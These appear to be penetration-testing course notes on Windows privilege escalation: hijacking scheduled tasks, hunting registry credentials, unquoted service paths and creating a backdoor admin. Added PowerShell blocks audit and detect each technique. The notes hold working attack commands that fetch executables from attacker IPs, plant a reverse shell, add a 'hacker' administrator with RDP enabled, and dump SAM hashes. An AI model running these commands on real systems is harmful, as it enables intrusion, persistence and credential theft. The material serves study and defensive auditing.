
Abusing Other Windows Components (Misc)

17.15.1 - Scheduled Tasks

icacls permission flags to look for in the output below: Full control (F), Inherit (I), Modify (M)

https://bad-glitch.github.io/posts/privilege-escalation/tasks/scheduled-tasks/

View scheduled tasks

schtasks /query /fo LIST /v

Check the permissions on the binary an interesting task runs, for example one stored in a subdirectory of a specific user's profile:

icacls C:\Users\steve\Pictures\BackendCacheCleanup.exe

We download our exe to the target and back up the existing task binary so we can restore it later.

iwr -Uri http://192.168.48.3/adduser.exe -Outfile BackendCacheCleanup.exe
move .\Pictures\BackendCacheCleanup.exe BackendCacheCleanup.exe.bak
move .\BackendCacheCleanup.exe .\Pictures\

Once the scheduled task runs again, we should see our user added:

net user
net localgroup administrators
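Added example (not from the original notes): the defender-side check for the misconfiguration used above. It walks every scheduled task, resolves the executable each action runs, and reports any binary that an identity other than the task's own principal or an administrator can overwrite. It assumes Windows 8 / Server 2012 or later (the ScheduledTasks module) and an elevated prompt so every task definition is readable.

```powershell
# Added example, not from the original notes. Lists scheduled-task binaries that
# someone other than the task's own principal or an admin can overwrite.
function Get-WritableTaskBinary {
    # Identities that are expected to be able to write to system binaries.
    $trusted = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'NT SERVICE\TrustedInstaller')
    # Any of these rights lets the holder replace the file's contents.
    $writeMask = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl'

    foreach ($task in Get-ScheduledTask) {
        $runAs = $task.Principal.UserId          # e.g. SYSTEM, daveadmin, DOMAIN\svc
        if (-not $runAs) { continue }            # group-based principals are skipped here

        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue } # COM-handler actions have no Execute
            # Expand %SystemRoot%-style variables and strip surrounding quotes.
            $exe = [Environment]::ExpandEnvironmentVariables($action.Execute.Trim('"'))
            # A relative command is resolved against the action's working directory.
            if (-not [IO.Path]::IsPathRooted($exe) -and $action.WorkingDirectory) {
                $exe = Join-Path ([Environment]::ExpandEnvironmentVariables($action.WorkingDirectory)) $exe
            }
            if (-not (Test-Path -LiteralPath $exe -PathType Leaf)) { continue }

            $acl = Get-Acl -LiteralPath $exe -ErrorAction SilentlyContinue
            if (-not $acl) { continue }
            foreach ($ace in $acl.Access) {
                if ($ace.AccessControlType -ne 'Allow') { continue }
                $who = $ace.IdentityReference.Value
                if ($trusted -contains $who) { continue }
                # The task's own principal writing its own binary gains nothing.
                if ($who -eq $runAs -or $who -like "*\$runAs") { continue }
                if (($ace.FileSystemRights -band $writeMask) -eq 0) { continue }

                [PSCustomObject]@{
                    Task   = $task.TaskPath + $task.TaskName
                    RunAs  = $runAs
                    Binary = $exe
                    Writer = $who
                    Rights = $ace.FileSystemRights
                    Owner  = $acl.Owner
                }
            }
        }
    }
}

Get-WritableTaskBinary | Format-Table -AutoSize
```

Each row is a task whose binary can be swapped by a lower-privileged account; the fix is to move the binary to a directory only administrators can write to (or tighten its ACL) rather than to delete the task.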

17.15.2 - Registry keys

Check for credentials including plaintext or weakly-encrypted credentials.

Recursively search for registry keys whose name contains "password" and that hold REG_SZ values. /K restricts the search to key names; drop it to search value names and data as well.

REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K

Windows supports automatic logon. If it is enabled, the logon credentials (especially DefaultPassword) can be stored in plaintext here.

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"

SNMP community strings

reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"

Stored PuTTY sessions can contain cleartext proxy creds and host IP/Usernames in the registry.

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

Old versions of WinVNC and RealVNC store the VNC password in a reversible obfuscated form (e.g. XOR-obfuscated), so it can be recovered from the registry.

reg query "HKCU\Software\ORL\WinVNC3\Password" 
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

Read the SECURITY hive cache

reg query "HKLM\SECURITY\Cache"

You may need to load the SECURITY hive first if you're analysing a copy of the hive offline (the live file under System32\config is locked while Windows is running, so point reg load at the path of your copy).

reg load HKLM\TempHive C:\Windows\System32\config\SECURITY
reg query HKLM\TempHive\Cache
reg unload HKLM\TempHive
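Added example (not from the original notes): one pass over the registry locations listed above, reporting each stored credential together with the fix. It assumes it runs on the host being assessed; the PuTTY value names used (HostName, UserName, ProxyUsername, ProxyPassword) are PuTTY's own, and SNMP community strings are read from the ValidCommunities subkey where the SNMP service keeps them.

```powershell
# Added example, not from the original notes. Audits the registry locations
# from this section and pairs each finding with its remediation.
function Get-RegistryCredentialExposure {
    $findings = [System.Collections.Generic.List[object]]::new()

    # 1. Winlogon autologon. DefaultPassword is only used when AutoAdminLogon=1,
    #    but a stale value still leaks the password to anyone who can read HKLM.
    $winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $wl = Get-ItemProperty -Path $winlogon -ErrorAction SilentlyContinue
    if ($wl.DefaultPassword) {
        $findings.Add([PSCustomObject]@{
            Source = 'Winlogon'
            Detail = "DefaultPassword set for $($wl.DefaultDomainName)\$($wl.DefaultUserName) (AutoAdminLogon=$($wl.AutoAdminLogon))"
            Fix    = "Remove-ItemProperty -Path '$winlogon' -Name DefaultPassword"
        })
    }

    # 2. PuTTY saved sessions: host and user are always stored; proxy credentials are cleartext.
    Get-ChildItem -Path 'HKCU:\Software\SimonTatham\PuTTY\Sessions' -ErrorAction SilentlyContinue | ForEach-Object {
        $s = Get-ItemProperty -Path $_.PSPath
        if ($s.ProxyPassword) {
            $findings.Add([PSCustomObject]@{
                Source = "PuTTY session $($_.PSChildName)"
                Detail = "cleartext ProxyPassword for proxy user '$($s.ProxyUsername)' (session target $($s.UserName)@$($s.HostName))"
                Fix    = 'Clear the proxy password in PuTTY and re-save the session'
            })
        }
    }

    # 3. VNC: the Password value is reversibly encoded rather than hashed.
    foreach ($key in 'HKCU:\Software\ORL\WinVNC3', 'HKLM:\SOFTWARE\RealVNC\WinVNC4') {
        $v = Get-ItemProperty -Path $key -Name Password -ErrorAction SilentlyContinue
        if ($v) {
            $findings.Add([PSCustomObject]@{ Source = $key; Detail = 'VNC Password value present'; Fix = 'Rotate the VNC password and restrict the key ACL' })
        }
    }

    # 4. SNMP community strings are stored as value names under Parameters\ValidCommunities.
    $snmpKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ValidCommunities'
    $snmp = Get-ItemProperty -Path $snmpKey -ErrorAction SilentlyContinue
    if ($snmp) {
        # Get-ItemProperty adds PSPath/PSChildName/... bookkeeping properties; skip those.
        $communities = $snmp.PSObject.Properties | Where-Object { $_.Name -notlike 'PS*' } | ForEach-Object Name
        foreach ($c in $communities) {
            $findings.Add([PSCustomObject]@{ Source = 'SNMP'; Detail = "community string '$c'"; Fix = 'Use SNMPv3 or a non-default, read-only community' })
        }
    }

    $findings
}

Get-RegistryCredentialExposure | Format-List
```

Keys that do not exist are silently skipped, so the function is safe to run on any host; HKLM locations need an elevated prompt to be read reliably.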

17.15.3 - Using Exploits

Check privileges for anything special we could take advantage of

whoami /priv

Enumerate the Windows version and the installed security patches; we can then check those versions for known vulnerabilities.

systeminfo
Get-CimInstance -Class win32_quickfixengineering | Where-Object { $_.Description -eq "Security Update" }

17.15.4 - Leveraging Unquoted Service Paths

Another interesting attack vector that can lead to privilege escalation on Windows operating systems revolves around unquoted service paths. We can use this attack when we have write permissions to a service's main directory and subdirectories but cannot replace files within them. Please note that this section of the module will not be reproducible on your dedicated client. However, you will be able to use this technique on various hosts inside the lab environment.

Each Windows service maps to an executable file that will be run when the service is started. Most of the time, services that accompany third party software are stored under the C:\Program Files directory, which contains a space character in its name. This can potentially be turned into an opportunity for a privilege escalation attack.

cmd.exe

wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows" | findstr /i /v """

As an example, ZenHelpDesk here has an unquoted service path.

Check our permissions and work out which part of the path we have write access to.

dir /Q
dir /Q /S

Next we create an msfvenom reverse-shell executable and upload it to the folder in the path where we have privileges to write a file. Start your netcat listener, then restart the service (and check whether you have shutdown privileges in case that fails).

sc stop "Some vulnerable service" 
sc start "Some vulnerable service"

If sc start fails, query the service configuration and check the SERVICE_START_NAME (the account the service runs as) together with the privileges shown above.

sc qc "Some vulnerable service" 

If above fails check for shutdown privileges and attempt a restart

whoami /priv 
shutdown /r /t 0

17.15.5 - PowerShell Service Privesc

https://juggernaut-sec.com/unquoted-service-paths/#:~:text=Enumerating%20Unquoted%20Service%20Paths%20by%20Downloading%20and%20Executing,bottom%20of%20the%20script%3A%20echo%20%27Invoke-AllChecks%27%20%3E%3E%20PowerUp.ps1

cp /opt/PowerUp/PowerUp.ps1 .
Get-WmiObject -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select Name,DisplayName,StartMode,PathName
move "C:\exacqVisionEsm\EnterpriseSystemManager\enterprisesystemmanager.exe" "C:\exacqVisionEsm\EnterpriseSystemManager\enterprisesystemmanager.exe.bak"
Invoke-WebRequest -Uri "http://192.168.119.140:8000/shell.exe" -OutFile "C:\exacqVisionEsm\EnterpriseSystemManager\enterprisesystemmanager.exe"
get-service *exac*
stop-service ESMexampleService*
start-service ESMexampleService*
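Added example (not from the original notes), covering the unquoted-path enumeration in 17.15.4 and the PowerShell variant in 17.15.5. The one-liners above only list services with an unquoted PathName; this function also expands the candidate paths the service control manager tries in order (C:\Program.exe, C:\Program Files\Some.exe, ...), checks which candidate's parent directory a non-admin identity can write to, and emits the sc.exe config command that re-quotes the path. The service name, path and arguments are taken from the host it runs on; nothing is hard-coded.

```powershell
# Added example, not from the original notes. Finds unquoted service paths,
# expands the candidate paths Windows would try, checks write access on each
# candidate's parent directory, and prints the re-quoting fix.
function Get-UnquotedServicePath {
    $trusted   = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'NT SERVICE\TrustedInstaller')
    $writeMask = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl'

    $services = Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -notmatch '^"' -and $_.PathName -notlike 'C:\Windows\*' }

    foreach ($svc in $services) {
        # Split "C:\Program Files\Zen Help Desk\zhd.exe -service" into executable and arguments.
        if ($svc.PathName -notmatch '^(.*?\.exe)(.*)$') { continue }
        $exePath = $Matches[1]
        $svcArgs = $Matches[2]
        if ($exePath -notmatch ' ') { continue }   # no space, so no ambiguity

        # Windows tries C:\Program.exe, then C:\Program Files\Zen.exe, then
        # C:\Program Files\Zen Help.exe, ... before reaching the real binary.
        $parts = $exePath -split ' '
        for ($i = 1; $i -lt $parts.Length; $i++) {
            $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
            $dir = Split-Path -Parent $candidate
            if (-not (Test-Path -LiteralPath $dir -PathType Container)) { continue }

            $acl = Get-Acl -LiteralPath $dir -ErrorAction SilentlyContinue
            if (-not $acl) { continue }
            foreach ($ace in $acl.Access) {
                if ($ace.AccessControlType -ne 'Allow') { continue }
                $who = $ace.IdentityReference.Value
                if ($trusted -contains $who) { continue }
                if (($ace.FileSystemRights -band $writeMask) -eq 0) { continue }

                [PSCustomObject]@{
                    Service   = $svc.Name
                    StartMode = $svc.StartMode
                    RunsAs    = $svc.StartName
                    Candidate = $candidate
                    Writable  = $dir
                    Identity  = $who
                    # Re-quote the path; the \" escapes are what sc.exe expects inside binPath=.
                    Fix       = 'sc.exe config "{0}" binPath= "\"{1}\"{2}"' -f $svc.Name, $exePath, $svcArgs
                }
            }
        }
    }
}

Get-UnquotedServicePath | Format-List
```

Services running as LocalSystem with StartMode Auto and a writable candidate directory are the ones that matter; applying the printed Fix (or reinstalling the service with a quoted path) removes the ambiguity without touching the directory ACLs.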

17.15.6 - Add a high-privilege user

net user hacker password /add
net localgroup Administrators hacker /add
net localgroup "Remote Desktop Users" hacker /add
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
net users

Attempt to dump users

impacket-secretsdump hacker:password@<IP of victim machine> -outputfile hashes 

Or connect over RDP (xfreerdp3, or rdesktop as shown here)

rdesktop -u hacker -p password <IP of victim machine>

Alternatively, retrieve the SAM and SYSTEM for use with SecretsDump. This method is useful if you have SeBackupPrivilege

reg save HKLM\SAM C:\Windows\Temp\SAM
reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM
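Added example (not from the original notes): the detection side of this section. The net user / net localgroup commands above generate Security-log events 4720 (user account created) and 4732 (member added to a security-enabled local group); this function pulls them for a chosen window and shows who did what. It assumes the "User Account Management" and "Security Group Management" audit subcategories are enabled and that the prompt is elevated enough to read the Security log.

```powershell
# Added example, not from the original notes. Reads the account-management
# events that local user creation and group membership changes produce.
function Get-LocalAccountChange {
    param([int]$Hours = 24)

    $filter = @{
        LogName   = 'Security'
        Id        = 4720, 4732
        StartTime = (Get-Date).AddHours(-$Hours)
    }

    foreach ($e in (Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue)) {
        # EventData fields are easiest to read from the XML form of the event.
        $xml  = [xml]$e.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

        $what = switch ($e.Id) {
            4720 { "created user account '$($data.TargetUserName)'" }
            4732 {
                # 4732 carries the new member as a SID; translate it where possible.
                $member = $data.MemberSid
                try {
                    $sid    = New-Object System.Security.Principal.SecurityIdentifier $data.MemberSid
                    $member = $sid.Translate([System.Security.Principal.NTAccount]).Value
                } catch { }
                "added $member to group '$($data.TargetUserName)'"
            }
        }

        [PSCustomObject]@{
            Time   = $e.TimeCreated
            Id     = $e.Id
            Actor  = "$($data.SubjectDomainName)\$($data.SubjectUserName)"
            Action = $what
        }
    }
}

Get-LocalAccountChange -Hours 24 | Sort-Object Time | Format-Table -AutoSize
```

A new account followed within seconds by an add to Administrators or "Remote Desktop Users" by the same Actor is the pattern to alert on. The fDenyTSConnections registry change above does not show up here: registry writes only produce event 4657 when Object Access auditing is on and the key carries a SACL.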

17.15.7 - Third party applications

Check PuTTY session configuration files

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"